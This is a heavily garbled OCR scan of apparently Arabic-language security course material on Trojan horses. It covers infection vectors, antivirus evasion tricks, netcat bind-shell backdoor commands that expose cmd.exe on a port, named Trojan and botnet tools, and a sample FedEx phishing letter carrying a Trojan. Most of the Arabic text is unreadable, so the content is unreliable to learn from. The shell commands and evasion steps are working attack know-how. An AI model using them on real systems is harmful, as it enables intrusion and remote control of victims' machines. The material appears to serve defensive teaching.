^Uaill ^jL^.j^i3l ^jli tialaill o^C*Lula .4_l^uJall ^aUaj L_U> gaj] D^lj^)Ia ^jL^a^. ^J^)Ja ^jC ^ iklLujJ ^ alia aII (J jj^a jll Ut a< 



IRC (Internet 
Relay Chat) 



Physical 

Access 



Browser a rid 
email software 
bugs 



Fake 
programs 




Legitimate "shrink- 
w ra p d 1 1 so ftwa re 
packaged by a 
disgruntled employee 



Atta ch one nt s 



U nt rusted site 
and f ree ware 
softwa re 



NetBIOS 
( F i I eSh a r i rig] 



Down loading files., 
ga me s p and 
sere en savers from 
Internet sites 
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(Instant Messenger Application) cjIjjI^aJ) cjtLJaj ± 

J ^ v^m^ l uj^ .Yahoo messenger J ICQ cjL^U^JI CjULnki <jc lA^ 
cjlijiiaj <^qAaH ^j^-vaU cialAnJaj ^ ^\ .jj>jj V aS\ l ' .(jjl (j* j\ J^jl o^*^ 6 messenger c^^A 3 ^^1^1 

C5^- ^100 I^SLLa uj^ U' 4-^3 V ^^aJLuixll . jU. jj^ll (Jjjia (jc- jAxJI j-* L^b c*JUa djja. ^messenger 
messenger ID tjj-^ ^ La sj ^ o^-^ ^j* <jl l_ ^ m ^ <Ja^J J jj j^xu jl^. ^j^ ^>^V1 < ; ul-^il 

IRC (Internet Relay Chat) 4- 

Trojan.txt J^l Ija <> *cs^ ^ ^ u' Trojan.exe jAil ^iki^ ^j^l ^ IRC 

j^k; ,DCC (Direct Client to Client) <As 'IRC <> ^ Jj^l ^ (With 150 spaces).exe 
L_flLi Jc- ^jii^j (.exe) o."^ uj^^^j ^ (JjjUII - ^» a m ^$j^xl\ < . l_a jjuj cAiLJI cIa JiLd ^jiii .(.TXT) cs - ^ 

l-aIaaI (Jj^j La LJlc. (jjjVn^l jj ^^Im^ .A-uL^g dijjjjj j' ^J^M ^lal j^ii Jll djliLJI (j-a ^1 lSj^'v ^ 

.4_ijU^Jl g*\ jA\j A^LVI ^IflVl J J' Jl c5 jiali ^jll jlaLLxJl ^ IjJ^J V ^-iV 6<JjU^3l 4_l^LVI 

Physical Access 
, jj* jjj^II (j-a^U <jjou11j 1^. jjj*j jj jjjx^H ^5^LJI jll ^jj5j 

d^I jjia ^jl - C-UJJJj <jLc. <L>Jj^a L_J j ml ^ ^-3jC- ^1 (JLujJJ ^3 ^^JjoixJI ^^Uaj ^^LJl J jj^ jll ^JjJ ^^JjoixJI 

J Ja yuJ^A (J-aj3 ^jJa j ^aJJ La,jjc .^^Ldll J jj^a jll lilLaJ LoAk- ^Uajll L-JJj ^il ^ j^.1 <3Jjia [AlltOStart] c _^jLallil ^Aj3I 

:CD ^ Jla Jc l^ja j ^jj ^lill Autorun.inf ^ J^ JULo .^I^V! ^j>! j ^ Ljlili I^jj <li ^CD-ROM 
[autorun] 
open=setup.exe 
icon=setup.exe 

■ ^ 2^^^^^ CljJJJJ (Jji_jujj ^jla A! j(g > nj o^ljjla (Jjstjujj (j^J 

.<u ^Lill ^j* jl U Ij^ij o^j 'M^ 5 ^ ^j^-^ 'CD function uj^ j*^ V o 1 ^^ c> 

I^J LaJ ^atjiJl (J^^A 3 (JC- Jlfltill (Jjxjujjll 4jilla j pliiaj ^JJ ^j) ^Tjn 

Start ^ Settings ^ Control Panel ^ System ^ Device Manager -> CDROM Properties -> Settings 

Browser and Email Software Bugs *t 

Aiajj jl iJaa^j ^jj^ Ljtfllj* jl^JI l-jjj aj lLuj^ j>» Jj SjLij i^Lujj jjj^j>^j ^—^j^j (j -0 jl^-^l (jl l!^^ ^j^*-^^ 
.4ijj«^3l J^LUI ^ j^VI jA\ L p a *j jl Outlook Express Jjj^V^ ^j^^ c> ^ j^j^^^ jt 

JtJJJ JjjJ^lVI ^^>^^ 1 (j-Q 4 a i dj^.! ^CjliajxJl (Jjjft^J (JJ^ C5^" LL^axi (jj^3 t — * ~ I^JLuiaSI ^Uaj 4^j^.l Dj-d 

_C_jIjI^j^V1 6^A J^ajk ^j-d JlL <iV t^a^JjoaJ (jl 

;Cjlinlajll ^ ^p£3! jl^aVI ^l^klojl tjnnj t^lli J£ 'BUGS 6 ^ ftjjjrs ^il ^Sl jJI 

http : //www . guninski . com/brow sers . html 
http://www.guninski.com/netscape.html 
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(Fake Program) ^>2I 4* 
J!* djl jjiAxJI l^liAaj ^jj ciiia 4<jL^.LiL^.V <jjuj\_L<i ^^jII A-ijl a A\ Jj-^jI 4_i^jJaJI s-ljc-j aS >>n ^ ^ &-j a^I g a!1 

^jj _4^^jjab<JI d^j^JI ijp. * ^.njj (Jjuaij AjI &aJI Jjjli j>» J^iilaj U jmjj ^c^l^JI Jj^aaj ^jIj Aja uall 

JjajjJ ^j) Liajl (j£-aJj .^.1 Ja^^Ll ^jl (jj^ (j-G ^Ig-xJl ^J^)J (jj.Vu ^ S^jujU-o POP3 ',^'^1 JJ^>^ ^ A ^ J JJ^V^ ^L>^ cJ^jj 

.^Ig-xJl IgJb njjj SjSl jll CjLg jIslaII £-<^ J& L_fl^Jl .^JjlLJl djbjjJa j A^^unl\ JjuJI t - \\ <iK 

t^J) ^1^3! ill JL^j^U ^Vimi jSai <POP3 -Si 110 ji 25 fhviJj jj&WI ^ 

Sj^il! .Ajjl a all £L-al^)Jl 4_ix»jJaxJl 4_iik-<Jl 1 ^ jll ^a^JjaaJj <Jj^lJ (^£^kl Jjjlkl Aj\ (JA (j^J '<J-^ A "."^ 4<J^ixJl 

.MP3 pUa&l 6 jU& ^ill j tfake audio galaxy ^ .^^V ujA^ 

^aJJ ttilli AiLjaVlj .MP3 cAiJjj! ^jJa jl 4^UaJ LlijljlijC. 15 <^Lulo ^l^klujU ^1 <JLa Uijj ^.l^xJI 

(Jj^aalLj qjajLi jJ^iiill (jj^Vlm^l ^l^k] tilli ^I^JjojI ^aJJ L— Lia -( J£joJ| (Jjoij ^^Jc Uiajl l£^>^^ ^ ^h^VI (J^axJ (JJj^J 

(jjil! ^i^iLuJI ^Ld^jjaixJI l t \y *aj L_a jjujj backdoor ^ 2^^^>^^ cJ-^ .i^JuJI u^^^ (JjjUII ^£> 

.ADSL cj^-^aj jj^ ^kiaij 

^^kiaix» ^1 ^^kj jl jSaj liA j .setup readme.txt ^ Vu* > ? ^ & -W^ u^ ^^ > 

Shrink- Wrapped Software *t 

.s^ijjL ijji^ (jl o;^!^ u^ 1 ^^ ^> l^mxj Legitimate "shrink-wrapped" software 

Via Attachments ^ 

<j^aLk3 ) Sj^VI jia^JI qj± (j* & ^jj l^il diia. t(exe <-ii^) Jj*j^ 

,aA\ jM\ oj± c> «£Ai ji^J! " Microsoft IE Update" ^ ^ ^ jj^V 1 ^ d** J - 

_Uj1I1j iaa^JI CjULJI iiiiL ^ j£i ^jSI ^Ik^VI I^j^I 'Outlook Express jj^V^ ^j^^ 

Untrusted Sites and Freeware Software *k 
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qa (g\ Jx^j SjjIaaJt Q*i .cjU^jJI NeuroticKat {underground sites) ^SIjJI <> c*]Ua 

_jj j^-^- J^ ^Ij^ 3 * g 13 SUS AjIILaj (Jj^j (jl o^-^ Jli j^uiaII ^3 j>JI (JiLa Jc ^ij ^j]| CjIj^VI jl ^alj^JI 

cj^l^jj feedback <J^-^ l£ £*l j*^ 1 u l fl^ji Jc- ^ j^-ij 4_}il j^l * J^ J^ £^ j - *^ 

(JLijI£ lit La AjA^ ^n^j tl^Jj^jj <Jji CAiLJl aifc (j^a^Al J^-^ (jj<OVim^l Jc ( . lau .(_£^>^J 4 jj» uj £al ^ Jl 

.4Jfc jiAo jl 4 jqj'q^ £fj (j-a jb (jSj a! j\ 
4Jaiij-<J! ^1 j>Jl jl) Jj^VI £-3 ^<JI (j-a IgJ-LaaJ LJLaJ (_£^)^J 4 JJ» >* 6 PGP 'ICQ 'UllRC L&-° daLi^ 

.^juiij £L^U^)Jl "^JJ J^ J-*^ ^ J^ C£^>^^ £^ J* L>^ L>^ L>^J ' fi^^^ 

1 ■ lao 4^Lx»l^)i3l" 4_L^jl3l ClAjLnJaJ t fltla a £xa AjljujIj CjUa jQ^ a ^£J^3 (jjillj cAij^stxJl (jx»VI jj^a (j^alaJl £§1 ^<Jl L-jLau^a) 
£c-gI^)Jj CjLujjjjiill *Lail^a ClAiLulaJ ^I^JjojU (jLa^VI (j* J ^ g - < . ^ Jj 1 g * ^ jJl CjliUl ^jc ^Jjjjoi^ (jj^J (jl 

^\ ^ A\ ^jti <!L^. ^ (jaJ ^ j-^l (jc JjjjoixJI ^jl£ lili Lj^jVI ^1 ^UDP flooder 'J^>JI J^f^ 

_(jL^. j^)J ^ ^3 ^<Jl (^^Jc djliLa ^jJa ^3 (jC (J jjjoiaII 4_iljjjaixi!>l!l (j-G ^jqlun L_fl jjoj 
(_^l (jC L_Lua^3l Cj^. lil .l^JJ ^frlaJail (J^a^3 ^JJjll CjlflJiJaJ jl ^xil^)i3l ^ jj (_^l ^ (jjLdlxJJ (jjill (jJ-d^JjauJl ^^^ic c . La>J 
(jxi ^ q> f >i^ll Cjljn^ ^ ^1 CjUai JL^j (jl c . ia>j Ajli ala J oUloil (_^l Lou lil ,til3i (j^a^B t . t^j^. c aL> 

NetBIOS (File Sharing) i- 

^nnl j t^Uaill <J jj^ jll (jj^kVI (J^ (j^ ^-^1 ^"1 (j^-^ tdjlilxJl A£jLaui (jj^ <LJ ^aJJ 4(^1 6^ J^-« ^aUaill ^^Jc 139 ^-^1 (j^ lij 

.^UajJI ^ c^LJI Jja*j j ttrojan.exe 

^Jc. <juoij (JjxjujJ o^lcl (j^J 6^lj^)ia (jli ^UlUj tjjjir.uull D^lcl (jiajSj ^aUaill cJ^*-^ ^ DOS r* a I iklLujI Uiajl a^I g aI] (j^J 

ijl JSSjI 6 Windows ^^-^ jl^ 3 ) ^^Jl a£jU^ ^iA . jjall 
Start -> Settings ^ Control Panel ^ Network -> File and Print Sharing 

Downloading 

,6jJaa. (jj^i (jl (jlx»j dujijVI ^1^ c>» screensaver j 6c_jIxJVI j tCjULJI Jjjii 



(How To Deploy a Trojan) S^ljjla ^U^a j^j 

46^1 J^a ^a^lA Lullj g ^11 t^ji^jJall jl^a. ^^-Sc Sjj-ijuill <J^.I (j-d ^A-l^jJall ^aUaj <J jj^ jll (j-d ^.1^>JI (j£-ftJ ^^l ^ilwJ jll (jL^. JJ^I 

(jxi (J^jl -^^^ 4-f^^l (j^ ^^>^^ JJ^ iajlj Jc (_£ jl^J <;l^jJa3l Jl Ajj JJ^J] ^-SIjuJJ J^J^ ^ 

AjIj^I 66^1 Jjb C-UJJJJ ^ajlj - < r l^jJa3l ^aUail 6^1 J^la cJ^J^ ^Ij^ 3 .*^l J^la ^L^. £A 6^)jujUx -laJJjJ 6^.1^31 

(illxij ^1 g aSI (jli ^ ^^^-^ ^i^J^ajl -iaJJ ^^>?^ ^^J^ f J?^^ ^l^. Jl 4_i^jJa3l J^j^ jJ ^JJ ttillil 4 .A-ia - ^aJI 

;^ljjuj 4)\aC* jl CljjljVI AiL^a ^l^U - bJI ^ala lil .a^I g aSI ojU^J ^1^)^.1 c^l ^J^.J AjawJalt alJaj Jc <Lal£ll 6^)IaJjaJl 

uj <jujL II CjLq jlx^ll <3^)juj 4 j£ <Lj g aII (jli 
B (_£jaJ 4 AiaJl Jc^ dil (j^l J v - 4_i^jJa3l <!l a I iklLujI LJajl (j^J 

Jc D^!j^)!a (jL^a^. dlJJJ (^•iil ^jj^)J^I (_3^^>^ ^3 jl AJAA^ A L ^ij Jc^ (j^^aJLab<Jl Ja (jC jjU^ll 6^_^l L-jL 6^lc 

.(JiSald JJ^I (J^jV jfi JJJ^^I ^lAaajoal tilli Asu j£ <Lj (jjill (j^ J> bllCkdOOr '^-^aj ^^1 a^j 4_j^LaJl jj jjj^ll S^aJ 
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Apple Store 

Cat 1-6(Xl-Hiy-AJP-F»LE 



Cr-^r _Lt..L':rif 



Link to Trnjn n Server 

ti.i w ti« n*:i3i up-to-da» sous erpG|r>3ce^3*OTg«^^^iW 
yKilrig Sice* 3roe* vgr. crflnfry j"' t " ' ! 

Tnsu *Lr-- ««#hI A*pU Hlw CWUmi Ek i iLi i m 1 6W <T |l t 11 'Ji * wi * 



Victim 



Attacker install-s j 
tJiie- Trojan infect ii>g I 
his machine \ 



WctlmcHtks ih» link and 
imn^'dijlLlv connects to 
Trajan verver in Russia 



Major Trojan Attack Paths: 

a User clicks an the malicious link 
« U ser ope n s r« n I i r i o u r- m .Til n tt ti rhmr nt? 



] 




The Trojan coninedts to 
thu dttdLk server 



Attac k «* se rid 1 
to vittsjm ccmiaUniriK Mrik 
to Troji 



on ia In inn Mnk — — — V 
|jn M#v*r I \ I 1 

vL>tZJ 



Internet 




Attacker 



fro ;an is sent to the victim 




Trojan Server 
(Russia) 



(Evading Antivirus Techniques) cjl^jj^ill a*±\±a cjLSj <> ljj^I 

;cjLuj jj^I * M^-^ worms j j jj^ ^ dAkiLujj ^^ill cjU^IH c qVi^ ^ ^Jj Uua 

<j^jj^ -3 

Convert an EXE to VB script 
Convert an EXE to a DOC file 
Convert an EXE to a PPT file 

.checksum -4 
.hex editor ^l^i^U ^IjjL -5 
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(Type of Trojan) Ch>jJ® (6.3) 



/ alia all (JjLoj jl\ <jujL II CjLg ^Ll>JI ^^-Sc (J jj^a^Jl (J^J (jj^T^ g a\\ (Jj3 (j-a lg_x»l,lkjjuil ^aJJ ^J^ 3 

'email Trojans 'document Trojans < command-shell Trojans fal jj^ ^ ^1 jjl ^) Iaa ^kij 

^kj tproxy server Trojans <botnet Trojans 




ciiijjj ^ . AjauJal l jl^ ^ (command shell) j*l jVl <9jis3 a*j ^ ^i^il! gr k*j Command shell Trojan 
^l^JI ^ Trojan client ^ .o^W^ JL^V iii* ^illj t3 j^ > ^ l ^ (Trojan server) s^ljjL 

jW (command shell) j*l jVl J^-^ ^ v^ .. n ^ill j 
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Command Shell Trojan: Netcat 

j*Vl liA ^ .DOS shell J] telnet lU^? <J M-^ 1 t> ls^'j Backdoor J ^\ 'Netcat 

pL^j ^ ^1, , )^ jLqj 'Netcat .5000 -^j^ u' <^W^ <[C:\>nc -L -p 5000 -t -e cmd.exe] -W^t 
^reverse J forward *l lU^W DNS o-^ ^ c?' t> J J) <UDP jl TCP j^l^JI ji jl jll cjVL^VI 
(Source address) u'j^ c£' 6 C5^> j^a>» iaia c$i ^ hvim l s j^ll jajj <li tt^li Jl iaLjaVU .ajjojUJI CjI jjI^jII 
L^ja a (source routing) j^^^ ^^-^1 iat_L<JI Cjlj^a ^ C5-^ ^ * IaIjI^cI 

diVU^ajVI Jc ^j3Lj ^UjJ ^-LuJI Jc ftj^Slt .(stdin)^^-^ dl^VI jYI jia^ Cj^^U^ s^lja 4 £ ajj 

.Sjjl jll 

Jl uAjflll Jlk^YI J^Jjj ^JJ ^3 t LljJa^ll C5 lc Qpu* iilo Jl TCP (J 1 ^ *Luijlj ^»jl} "nC hOSt port" t^l^Lual kjudJl 

.A-jjujUill dL^tkAxJl Jc c aLall ^xj ^ jj^Jl j ^c^ 1 jll t^j^YI CjULulaSlI «>h» a (jc c allkj c*] jLJl liA , jL^ajYI A^f^j 

Jxij ^ j t (arbitrary ports) ialiJI Jc^ s^jl jll dYt^^U ^UiuiYI 3_Aiaj Ljajl Ja*j jl Netcat 

UUi cjUUJI cilj^j JI jj V < J^*JI jf ^UJI ^-^a j ^ J-^ ^ c^W^ ^ Netcat ^K. 1 " 1 .^ ^ t° j ^IjSlI 

c> J 'UDP jt TCP jll jl SjjL^JI CjVU^jVI ^UjI - 
.^UJI cjIjjI^jII ^ 4 reverse J forward DNS 

UL^ l^jj^i ^ ^1 (Network Source address) j^^JI jlj^. ^1 ^l^k^l tySiS 
.(randomizer)^ <^^JI ^U^ll L >^ai s j^ll 

a^aJI (source routing) a^jj 

N ^Ij ^Slow-Send ^jll 
jl jllj ><JI Hex dump 

iii^ll ja 23 [nc -1 -p 23 -t -e cmd.exe] j*Vl responder telnet-options ^j^VI Sj^ill 
^1 duiil] cjLjajlLi <j| ^ J^Uffl Netcat (-t) j^^^ * \:° v; ^ j& (-e)j^^l ^Loi^iU [-1] jU^JIj telnet J 

jt TCP ^ e^ 1 ^ jCh-jJ > .UDP jTCP ^V>jjjjj ^1 cjI^JI j u\JL slJ ^ Netcat 

.^Uaill jjc J jj^a jll l_lo£ ^ i£ .qj telnet s^Loiaj ^jJLolLJI j l^^JI ^Uaill C5 Jc UDP 



Command Prompt 



C ttX . IO HT ] 

conzkjQct: -bo BomsmberB: rijc; r — options I bostnamc port[s) [porta| . . 

lixtsn for inbourkd i e»jc= —X — pox-t [optLcmj ] [hax tnane:] [part] 
c-ptdona : 

— d de tz a f^l~> f xtm ponEole r stealth node 

pr cHj XnJborundl pi n nj i 11^ to exec [dongemwf f J 

— g - orito aouroc- routinq tiop point f b ] , Tif> to B 

— & rrrxEii aoiircse- rontinq f>o-a.nt:^r : * 12, . . _ 

— la. +Jrkj_ J3- crirxift 

— ± bccb c±cX^.-y intcnrol tor l±ooa Boat r porta e-rrcurkj 

L listen harder r re Listen on -cx^Kicz- 1 close 

— in numerl cr— only XEf a-ddx«s sea: no LW^ 

— e> file tic=:m dui^i u f" 1 : .a j f j ■ - 

—p. p«t local port nnbu 

- -jt randooias local h*t>H mote port* 

— zz zero — i/o oodfi [ u_ai3-ti for afti^Tiin i ncfl 



I 

9 
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Gui Trojan: MoSucker 



http://dark-e.com : j^-a^ll 

jlkkj opuj ^jaJI j^u ^jjj MoSucker's edit server program .Visual Basic Trojan j*> MoSucker 
4%*^ Mosucker '<j ch> jjj .(jJ^^J jV j system.ini yi lU^ Mosucker 

_Jaaa LjLJI ojjj^kll <JjLoij3! jjc <U A\ L_aj| j^JI j^^j a ^ *j j^^- ^ J-^^ C5-^ <LjIa3l jLilkV 
.(Sj* J£ ^ jt £^13 ^ Ul X) c> X ^ Jj^^Ji <^ MoSucker f s edit server program 

i^VtS ^ Mosucker & ^u^t LL^I j 
(Zip file is damaged, truncated, or has been changed since it was created. If you downloaded this file, 
try downloading again) 

;^LaJI fuJ jjJii ^1 j MoSucker *UjuL ^UjV 
(MSNETCFG.exe, unino686.exe, Calc.exe, HTTP.exe, MSWlNUPD.exe, Ars.exe, NETUPDATE.exe, 
and Register.exe) 

.Clipboard Sjbl 

^uji AJiji/ci^j - 

(Crash System File Manager) fUadl ^ Sjbl 
(Taskbar)^W^ -^j^ 1 ' system tray < (Start Button)^M jj jW^j/^^j 

- 

CD-ROM j " 
ping ^Lk - 
Pop-up start menu 
(process manager) ^Ul^ j^ 
j^j^ ^ ^UJI Logoff /standby/ J^ftll SjIcI/^JiISjJ 

(Window manager) ^alj^l 



1D.OQ1? j j zoaas 





j Fill 










| NtProperlH ! 


| tcarxs 





Server r^arrtl>>_ 



ekc . j ' .bat. sfli. :oc .con • t>c-c.>. u . tx&, 

I «-3aaj "I 



□3 

CD 



□ r *™ i c 
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GUI Trojan: Jumper and Biodox 



^vimj (jjd^l g <M .dijjljyi <luaJl ojLjall (Jaa^j] ^jAxJI ^in j SjLja j Jumper 

4_jaLjal Cj^^ii Jj^^L Uiajl ^jIj a laJLuiAll ^Uaj AJLJI CjU» jIslaII J!Lo <jujL 11 ciAiUJ! ^^Ic <J ^ai] Jumper Trojan 



^ I ^ UA^ jj^ ^ lij *C:\Windows\System32 ^> ^ BIODOX OE Edition.exe ^1*11 uj^ u> <\+**> 




<±a^a] | L^Saj ^ *^ljj]a j ^ajj ojaJu s^lc j^a^I^I . (Document Trojan)*-*£jft u^ 1 ^ ' "uffi 

CjUL j j£5la lajLuj jll CjUL jl diUij^a 6 (office documents)^^^ j 6 cP jj-^V^ ^j^' JjI^j <Ja Sjj^ 

,6jLja cjUI^^.] Aiali j 4_jajLud^JI djUUJl jll (jj^^l ^ m S\\\w^\ ^iil ^a^LolaII (jfeulalll exploit 



September 2 r 2012 



VIA LFTTE R 

~ ■" Srevens. 
Royal Cor - im unseat ian-. Cornpany 
445 ISP* Street S.WV, 
Waihurtgton, DC 

RE; Fctfex Sritpmefi t Alrvw av Bill Number:B676 76M«]5& 

Dear Mr. ^tcvoriL: 

We hawe receivEtra package addressed to you at the value of USD 2,300, 
The custom duty h^ia not been paid for this shipment which is listed as 
Apple iMac 24" Com puter. 

Plee^e call us *T Fedest at 1600-2 J4-446 Est a*& e-msaFme at 
rr robertsigJfedeH.ccm renardinR thrs shipment 

Please vlsJt o*jf Fedex Package Tracking Website to see more details, 
about this shipment -and advice uton how to proceed The website 
i.nic is attache-cf with this letter. 



Trojan cmbt^ddtrd in 
Word document 



Sincerely,, 
Michelle Robert* 

Customer Service Representative 
Intern atiortal Shi prnervt a r>d Handling 
F&eTe* ATJanta Division 
Tel: J.SOO-234-446 Ext 34 5 
http J/wtfw iredex com 

rr r ub =?r 11 f.^ i_pm 



E3 



SB 




Attacker 



V 




I A1 tfl c ker embeds Troj an m t o 
- a Word dflcufnent and infecH 
■ victim computer 



VictFm J 5 
System 




Trojan is executed as victim opens the 
document and clicks on Trojan package 
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Email Trojans 



giL ^vim^ l f\A kh^l .cjlia jA\ J!^k ^^jj^ J-^ jj ^ .bulk emails e&J^ CP Email Trojans 

^3 jj Email Trojans u^^^ o^*^ ^-luulU (jjajj*^ jj*jM .^i ^ <L<»,jli3l ^jjjSJVI ^o^t cJ^-^j I j^j^ 

_Ujtfllj CjUuIxjI! .Jjijj ^JJ i o t^jjl&lVI ^O^t 4_iauJa3! ^j£j La,jjc. -( ^jjjj^3yi ^O^t <J^-^ L>^ 1 ^ dil ajWl JLojjU (J^gjIj ^jj^^l g a\\ 

>C5 jjjj^3V1 ^o^t cS^^ 3 j^j*^ cJ^j] lS^^A 3 CP ^ <*— i^i^ll ^tajlai! ^ ^ia^I^J! (j£-aj t^UlUj 

.Email Trojans ^l^l^W ^ 2^J^ 



Instructions are sent to 
the victim through emails 



filu drld Idunch cik.umr 



— — 

Email 




Any commands for mo? 
Hcfu is the requested file 





Attacker 



Internet Firewall 




Victim 



Email Trojans: RemoteByMail 

*l}JjJl (jLoijj (jjjjla A i mAJ tilli j-a ^jc jlajll (_pasu ; jj jJAa^II j^g-?" C5^1 J J 



3J \\ j sjkjjl RemoteByMail 



JjJjolJ 

.cjliLJI ^2fl j! ;^jjjj*U3l djliLdj ^iljJI ^jijj ^^Jc Jic-Luaj 

.cjUUxJIj ^jjjUV! ^jjj3! ^ <jW RemoteByMail ^ Start Server ^j^^ ci> j^ 1 :Start Server 

.^j ^i^ a:i3, Stop '^J4 c3> j^ 1 :Stop 
.^U jA\ cjU jkx» j^ : Check now 
cPjj^V^ ^J^^ ols^j ^ :Listening to Accounts 

.^UjJI UliiL ^1 j^ljVl ^ c^j^ cr^^ cPjj^V^ o^^s : Emails received 

jVI ^ ^jj ^ o^j ^j^l j^'jVI o^j*i :Command queue 

.<jJUJI ^jjjjUVI ^jjJI JjL-j o-a^i :Outgoing emails 
.RemoteByMail c> W^-j^ ^ ^ lPjj^V ^j^^ Jj^j lP 3 ^ :Emails send 

:aJU3! j^I jVl iijjj l^j RemoteByMail 
.ciL o^UJ! ^jj^V 1 u 1 J\ "HI" c5 j^JI ^ yHJJ^ J u jV e^ 1>n1 :H I 
,t*L o-aUJI jj^IV^ u ( J] ( *<j>^t jj ^ *^ ja. cjUIJI Jjojjj :SEND 
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£tji3 .t*L (j^aliJl ^jjJ^lVI ^JjJl (J I J^C Jj t *auU^l jj jjja^l Jc oA Ch\ lla all j) CjULJI JIujjI <jaj ^» - gaJ ^ajflJ ;ZEND 

.L-Lud^JI pLuljj Aic l^jjlkl Jll jj^Ji <Ja^l tAjali Asu Ja jt > ^i^ll ^a^JI 
.( LjjaJI jj Jc jBLII CjUL ji jJ! ijiiL fjL :EXECUTE 
.tSL (j-aUJI ^jjj^IVI .ijjJI (Jj ^ N V o^jSVl J^jj :DIR 




Defacement Trojans 



.cjUUJI s^c-IS J *^ j*J! ^ jl^l jjj>j jl j^aj ^Uajl! Jc; 6 jj^j j ^Defacement Trojans 

jjjudii J Ja joijj ^jL <il dii^ jjL^l^ll cJI^IojI ^jc. s jjias. jl^jj^l j3£i Defacement Trojans 

c_jjj3I ^ J cjI jj^ ^^jj ^l^b HTML 
jjUjjxi Jj jSII < compiled Windows^ i> 4-^^ c£' i> ^ j^j^ j lP 3 j*^ ^ ^ JJ-^V^ 

(logo) <«— j 4_iLki3l jjj^IIj tAjj^ill J-*^ liLujij ;^-|jaJLuj| 4 jjj^j t^jlajsu (ill ^ajujJ ^Jjjj^aII ^jl j-g .CjUjjVI Jj jl 

Jli* . JjaLj cjllnki 4jj^i3 target-styled Custom Applications (UCAs) M . Jj^j g^j* t> ^AAV'j 

: JVI£ U dii^. calc.exe 



CdlcuidlDf 



_l_ 

~~ znrz Inez 

EICiJLiILJQJLJ 
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Defacement Trojans: Restorator 

http : //www .borne . com : j^-a^ll 

<-^l «j ^ .WIN32 jj^j 5^ JUxIojVI skin editor Restorator 

o^jc <A&*i .^l^ll c> ck^ 3 c^target-styled Custom Applications (UCAs)^l J^hj ^ 32 j>%9 

6 [.ocx (Active X)] Jtlall J^f^ tdjULJI ^Ijji ^ ^jAxJI jjl ^^ic* JjAxjIL till ^xujjj <uli t^iiill aj^UII 
Jilaui ^cxiUjj .Sjjij^all MhuW dAiLall ^^ic Cj!>Ijaxj3I ^jjjj ^ tl£^ .CjliLJI ^j^- j 6 [.scr (Screen Saver)] 
dilaU! ^ jj| jj( jbjluib till ^-.alhj (Grab function) 4lJa j .^1 jJI dik^l ^311 c^jAxjJI ^jII j ajIIj 

.t_fl^JI jill C5 lc- 

^illj (jjilajll 1 ^jIc Axusu c ^jJI CjULiJI c _^a jjt ^11) ^jl ^11 ^5-lc JjaxjIU till ^-<ujjj ^illj boom ^j^l £\ jll ^ii<JI Restorator 

^jljJI . jjjkillj t ^j^flSl l i j^aa^l l 4c_jj^jll/4^jil tiA ^l^ki^l tdjSxj .(.dcr) j (.rc) '(.res) ^(.dll) <(.exe) 
& jia^ll j jc- jUI/cjI jU^II Jl^il tilj^j ^Jill j .intuitive target-interface <^ j yr^ ^ (resource editor) 



Ks si of at or ZOO / Irial ■ C. \So1 twe ro Ukil Ipe d id . bxb 



la-CHfias Vl#ww :Ed<t Toois Help 



□ ca - 

Reawce Tree 

O li^j String 

p Lj rcdm 
inn 

Icon 
J MAIN I 

— t. i Vej ijlffl 



C9 ^ CI? [D ^ R - ^3 EH @ 




Saving 

D&lphi/Oi- Buider Forms 

Cadepage 
S Integration 
! ■' i- ■■ 

T c:-:H Editor 
File Bitiwsei 
RC Files 
Advanced 



< I 



II > 



H Show Toofcipi [detaulr] 
LrlJ Allow mukipJe: Restorator instances 

"EihoHAi splash icrt*n em itarl 
I I Keep Fiei-torator Window always on top 
M Ask for Folder, when assigning/extracting all [dcf-i-j t] 

Number at recently used tries n trie menui | ^0 
Number oF recently found tries m trie menu: 20 ^ 



L -=r r _ -.-I 



19 

20 
21 
22 
23 
Shr ing 



6543 6 
S5427 

65428 
6S429 



Integer overflow 

Invalid £ lQoting point opec*tion 
Floating point division by zero 
Floating point overf low 
Float mo noint underflow 



1 open hie 



j^Aj 4jJ* ^ r43 (Backdoor 'Trojan 'worms) software robots i> c> yr* Botnet 

SjUall <jlaall ^LnJI j (Conimon commands) jVl Sjia^ ci^j ^1 jJI Ja iLu jjj ^ j£s ^1 j a£j!L^J! CjVI ^ 

* ^-fl^VI .axj jo lJI^VI t> ao ^ ^jII -u^j (^l^li) Botnet .(Control Infrastructure) 
L5 1jLj^\j s^ljjla <i^*J ji worms m ( (zombie computer) ^ j^j^^l^ c> ^>^^) j^j^f*^ 

jUjaJ! cjIa^a (j^-la) jl tdjLoj jj^ll <>(spam email)^y^ J^jV ^^f^l^ r 3 ^^ J u^-W^ ci^ ^1^ 

^l^klojU ^jjLA^lg-All ^1 JjS ajIc ^^blajVI j I^SjIjuq j duj ^1 jj jjU^ill oj$a.I ^ .(denial of service s)^^\ 
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<JiLa CjIa^JI ^Botnet 6^cLui^ ^» /^^^ ^ Ia j^c-j iAjj^-uitJIj j^aJlj 4_ixu1xj3I cjI^jjoJI ^jja^jjoij Lq a^lc Botnet I 




Botnet 

- Botmaster 

- Hierarchal 
Multi Server 

- Star 

- Random (Mesh) 

Botnet Trojan: Illusion Bot and NetBot Attacker 

lili (JjxjuHll ^aUaj (j-a (jSa JJ 4il£ tJ-oxJl J lAlJ LoAic _ jl^C-VI J A^klLaaJ A^uJal j 4-1* jjujj 4-£^J J Cjli aLI Illusion Bot 

diijjj Jl J&l Bot t> cjUUxJI Register Service Process API ^ <WIN98 ^ 

.Explorer.exe ^ 3 >^KN ^1 j^Vl J jU^j -uli ^"n/nll ajLc; cAJik lij .rootkit ^-^ji^ 

C&C can be managed over IRC and HTTP 
Proxy functionality (Socks4, Socks5) 
FTP service 

MD5 support for passwords 
Rootkit 
Code injection 
Colored IRC messages 
XP SP2 Firewall bypass 

- DDOS capabilities 

^jj <iV .cjU^JI s^IJ j 4a£jj^3I a jbjj jjjla^l ^j^j j ^botnet * j Kj m1 ^ ^j >> i j jj^j j NetBot Attacker 
.EXEj (lP^^j J-^*-* ^3^- j^j 6 j^^) INI t .ufo ^ f RAR L 1^ ^-W^ ^Uaill Jc 

.Botnet ^ c> U Ja. ^ j^t ^ ^ JM * j^W sbVl oi* ^backdoor j* J^Vl NetBot Attacker 
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■is^jjt uj^ ^Uajll J*^ (j'^j c> J* Proxy server Trojan 

£ &1] 1 Sail jj jjUx^ll ^^ic ^^jud^j^j ^\a/^L» pli^jj Ia^j ^jj ^jc 'Proxy server Trojan 




Attacker 




Victim (Proxied) 



Proxy Server Trojans: W3bPrOxy Tr0j4nCr34t0r (Funny Name) 
